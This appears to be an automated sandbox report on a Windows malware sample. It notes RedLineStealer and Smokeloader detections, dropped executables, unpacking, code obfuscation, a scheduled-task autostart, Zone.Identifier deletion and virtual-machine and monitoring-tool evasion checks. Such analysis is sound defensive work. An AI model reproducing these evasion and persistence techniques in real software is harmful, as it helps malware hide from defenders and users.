Source: 0000000A.00000002.3041945625.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.3042190062.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 2[1].exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 2.exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wsjctfw.9.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: setup.exe Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: axplong.exe.0.dr Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: axplong.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: setup.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/6@10/2
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_02483D92 CreateToolhelp32Snapshot,Module32First, 8_2_02483D92
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe "C:\Users\user\AppData\Local\Temp\1000030001\2.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\wsjctfw C:\Users\user\AppData\Roaming\wsjctfw
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe "C:\Users\user\AppData\Local\Temp\1000030001\2.exe" Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: setup.exe Static file information: File size 1898496 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: setup.exe Static PE information: Raw size of qzeqbxes is bigger than: 0x100000 < 0x19de00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.760000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 7.2.axplong.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Unpacked PE file: 8.2.2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cus:R;.rufaxu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wsjctfw Unpacked PE file: 10.2.wsjctfw.400000.0.unpack .text:ER;.rdata:R;.data:W;.cus:R;.rufaxu:W;.rsrc:R; vs .text:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
Source: setup.exe Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
PE file contains sections with non-standard names
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: qzeqbxes
Source: setup.exe Static PE information: section name: qgghuozc
Source: setup.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: qzeqbxes
Source: axplong.exe.0.dr Static PE information: section name: qgghuozc
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: 2[1].exe.7.dr Static PE information: section name: .cus
Source: 2[1].exe.7.dr Static PE information: section name: .rufaxu
Source: 2.exe.7.dr Static PE information: section name: .cus
Source: 2.exe.7.dr Static PE information: section name: .rufaxu
Source: wsjctfw.9.dr Static PE information: section name: .cus
Source: wsjctfw.9.dr Static PE information: section name: .rufaxu
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 7_2_0024D84C push ecx; ret 7_2_0024D85F
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_0040232D push eax; ret 8_2_00402331
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_00403282 push eax; ret 8_2_0040328B
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_00402097 push eax; retf 8_2_0040209B
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_00401BB2 push ebp; retf 8_2_00401BB3
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_0248570A push eax; retf 8_2_02485718
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_0248532F push esp; retf 8_2_02485362
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_02486238 pushad ; retf 8_2_0248623C
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_024865DD push eax; ret 8_2_024865E0
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_024861ED push E60329CCh; iretd 8_2_02486202
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_024849FA push cs; ret 8_2_02484A01
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_02484CF0 pushad ; retf 8_2_02484CFB
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_02484A95 push es; retf 8_2_02484AAF
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_02487BA1 push edi; iretd 8_2_02487BA2
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_025C1C19 push ebp; retf 8_2_025C1C1A
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_025C20FE push eax; retf 8_2_025C2102
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Code function: 8_2_025C2394 push eax; ret 8_2_025C2398
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0040232D push eax; ret 10_2_00402331
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_00403282 push eax; ret 10_2_0040328B
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_00402097 push eax; retf 10_2_0040209B
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_00401BB2 push ebp; retf 10_2_00401BB3
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0249614D push E60329CCh; iretd 10_2_02496162
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0249495A push cs; ret 10_2_02494961
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_02494C50 pushad ; retf 10_2_02494C5B
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0249566A push eax; retf 10_2_02495678
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_02497B01 push edi; iretd 10_2_02497B02
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0249653D push eax; ret 10_2_02496540
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_024949F5 push es; retf 10_2_02494A0F
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_0249528F push esp; retf 10_2_024952C2
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_02496198 pushad ; retf 10_2_0249619C
Source: C:\Users\user\AppData\Roaming\wsjctfw Code function: 10_2_04081C19 push ebp; retf 10_2_04081C1A
Source: setup.exe Static PE information: section name: entropy: 7.978158442993088
Source: setup.exe Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.978158442993088
Source: axplong.exe.0.dr Static PE information: section name: qzeqbxes entropy: 7.95245066634278
Source: 2[1].exe.7.dr Static PE information: section name: .text entropy: 7.778601168086073
Source: 2.exe.7.dr Static PE information: section name: .text entropy: 7.778601168086073
Source: wsjctfw.9.dr Static PE information: section name: .text entropy: 7.778601168086073
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Jump to dropped file
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\wsjctfw Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2[1].exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\wsjctfw Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\wsjctfw:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Switches to a custom stack to bypass stack traces
